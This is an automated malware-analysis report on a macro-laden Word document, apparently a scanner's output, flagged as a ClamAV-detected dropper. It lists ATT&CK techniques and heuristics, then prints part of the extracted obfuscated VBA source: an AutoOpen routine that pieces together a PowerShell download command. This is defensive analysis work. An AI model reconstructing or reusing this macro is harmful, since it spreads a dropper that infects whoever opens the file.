Verdict: MALICIOUS
Risk Score: 242

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution

Malware Insights
The file contains a VBA macro with an AutoOpen function, a common technique for executing malicious code as soon as the document is opened. The macro makes a Shell() call, indicating that it is designed to execute an external payload. ClamAV identifies the file as 'Doc.Dropper.Agent-6447747-0', suggesting its purpose is to drop or download further malware. The obfuscated script makes it difficult to determine the exact payload, but the overall behaviour points to a dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6447747-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6447747-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24826 bytes |

SHA-256: f08ff0de306d14b68b71b2cffc2bdec3e6b4b7f827cebc2be781777f038e3383

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "IsLhzhocwqWjLE"
Sub AutoOpen()
On Error Resume Next
zqYkizjRQ = tzU - Sgn(WhMbcLRqTKpPLY) - (8827269 - Tan(7749295) / 7594660 - ChrW(wqpfSjSXN))
THdTiJMtK = WIJwGWNvSlI - Sgn(cQPBdGqO) - (5562509 - Tan(1818684) / 875102 - ChrW(wjqrKFzfjERVms))
iJFozmFvf = DdjFD - Sgn(GMDLAXfVkMmco) - (4491287 - Tan(9773693) / 8781053 - ChrW(lYhJoJ))
Application.Run "HkbtiqAzm", VZUfKwITAk
StCDdnhZt = owERbrLdj - Sgn(nzc) - (1486044 - Tan(1613008) / 2722625 - ChrW(OuhVm))
RDlSwUBiD = tAzZubmuNDal - Sgn(SQuuPdSi) - (2158229 - Tan(1206464) / 377058 - ChrW(BjJsqbAzzG))
bHjTibAUS = jjTBE - Sgn(mEkIiuws) - (8658070 - Tan(9210880) / 5708613 - ChrW(WbZ))
End Sub
Function VZUfKwITAk()
On Error Resume Next
QiGavkiL = NZaO - Sgn(IbYPkkTV) - (2434647 - Tan(5409411) / 1640903 - ChrW(wTJYrm))
zvZpn = UJJcK - Sgn(voorrkZiXE) - (3845859 - Tan(4340050) / 1354472 - ChrW(BORwrHiBQfhWnP))
vsNnGTOmiz = OwwOjpvidVrif - Sgn(OpCkmKFsK) - (7106670 - Tan(410447) / 9446648 - ChrW(YJKVzKoIGVIXK))
ntNhCSESz = WzCvVwacv + Mid(dzFJAwvM + "fSwYqruuW7+aW7V.exi3uV+3uVMVaW7+aW7+aW7+aW'+'7iaW7+'+'ahXz'+'+hXzW7MaW7+aW7Veiah'+'X'+'z+hXzW7+aW7MV);fo3uV+3uVaW7+aW7reaW7+aW3uV+3uV7ach('+'pTXasfc iaW7+aW7n pTXADCXaWQWTczwmrJNdRpwz" + vWklimLTQwAjp, 9, 160)
QwZXhsSOXvr = OMmvWVSzuYqT - Sgn(UuNc) - (707824 - Tan(4091334) / 948126 - ChrW(ldtTWSfjwF))
AAOVhriEr = mSHvkOjOUiFAMG - Sgn(WkYYBTRGcjtbz) - (710823 - Tan(7485029) / 3154526 - ChrW(TrjpNwcNUHkCjc))
rutpkSV = MdvvKXDfUL - Sgn(MrmjKhNGh) - (4138323 - Tan(4979375) / 656518 - ChrW(mvKhM))
VjARmd = jndzZDa + Mid(qil + "TFavKEUSUaLJX hXz+hX'+'z= iMahXz+hXzW7+aW7V aW7+aW7htt'+'3uV+3uV'+'p:aW7+ahX'+'z+hXzW7//va'+'W7hXz+hXz+aW7aDMw" + FoW, 13, 95)
JMnBXR = WTnHhF - Sgn(XNCpIfSKNZ) - (5170755 - Tan(145796) / 1976156 - ChrW(wPiOXMAbwWj))
XwzfsvzTm = NsrYWBjGDXuM - Sgn(tcBZAKHEiZ) - (722814 - Tan(1782158) / 8651629 - ChrW(tivQf))
nrQrAHRV = RSaS - Sgn(DZUEfZVRhdjz) - (520167 - Tan(9155205) / 2368827 - ChrW(liSnPdrmb))
qKzAbLHXzr = DwGMOWIrFaPL + Mid(iillb + "bCMwafoMjTaDMMzSGwQppShOm'+'E[30]+3uVx3uV)hXz) -cREPlace ([CHaR]71+[CHaR]81+[C'+'HaR]112),[CHaR]36 -cREPlace hXzZcNhXz,[CHaR]124 -RePLACEhXz3uVhXz,[CHaR'+']39) ) ') -rePlaCE 'hXz',[chaR]39 -CrEpKmQzA" + wCpZuLnalIP, 19, 182)
QGDZqYQCZOY = FLSChRS - Sgn(bokkTFXSKdwOkw) - (5297724 - Tan(6675297) / 8261254 - ChrW(DJXDFYajdjsib))
YYKGOqQ = aXrqvz - Sgn(ZCHXEfJiIjkL) - (7399383 - Tan(2521618) / 1743808 - ChrW(XjMKnbraj))
pCCavhRS = ioN - Sgn(lnrH) - (5886920 - Tan(1371600) / 2989705 - ChrW(AsQzUwHSpA))
mjZBh = GPGPaCij + Mid(lnAwzirKjJitVS + "FzRfDNQmEVOjNvdtAr]34).repLAc'+'e(aW7dB7aW7,[stRi'+'nG][CHAr]92).repLAhXz+hXzce(aW7iMVaW7hXz+hAYnVusSwta" + jjHiaahhcY, 17, 78)
zohAbLwpa = DCGhwhpzv - Sgn(cRzKwKSPlcYPvL) - (8172186 - Tan(2957485) / 2992477 - ChrW(rOzDSUtRY))
SDtNTPf = FdB - Sgn(XzNpwHPBQIf) - (1541355 - Tan(1011027) / 7699720 - ChrW(vqjS))
zBYbsufau = GhwYw - Sgn(RhlQJIbor) - (9527104 - Tan(9518500) / 160029 - ChrW(INpwpY))
LinJHCmzXO = wUHjoAzKh + Mid(DwUVDwzTfiBL + "iSHK+hXz+aW7.LcrToStraW'+'7+aW7BaW3uV+3uV7+aW7SsiBahXz+hXzW7+aW7SsNgLcr(),aW7+aW7 pTXaW7+aW7SDC);&aW7+TiXjJTPauVkkAPP" + iTtpHvSNLiXRk, 5, 98)
ITSZQVTuR = QjIAoNLXIFkwmJ - Sgn(wIJ) - (9254196 - Tan(3384595) / 6026738 - ChrW(wrAdwJzfV))
Ejzio = ApOHq - Sgn(CHiKHtOauHuL) - (8016865 - Tan(6126225) / 3736877 - ChrW(UqkRzKPCXdkbv))
pDfYJOJ = vuHTHomUSFdZiq - Sgn(npppIV) - (4677819 - Tan(4353105) / 4872268 - ChrW(srcmiImfzMAE))
cNDKrKI = PFJdKYLo + Mid(qzpqVqhPzw + "IIQujNrPnZKQnaW7hXz+hXz,[stRinG]3uV+3uV[CHAr]96).repLAc'+'e(([CHAr]112+[CHAr]84+3uV+3uV'+'[ChXz+hXzHAr]88)'+',aW73u'+'V+3uV8xkaW7).rhXz+hXzepLAce(aW7Lcra3'+'uV+3'+'uVW7,[stR3uV+3uVinG][CHLlw" + jRwJwpPK, 14, 174)
amwIRpwM = iOjTQLCVArk - Sgn(QSoCqM) - (318611 - Tan(8391577) / 4225754 - ChrW(cXsJhvQjhwfq))
AukIOZJYPM =
... (truncated)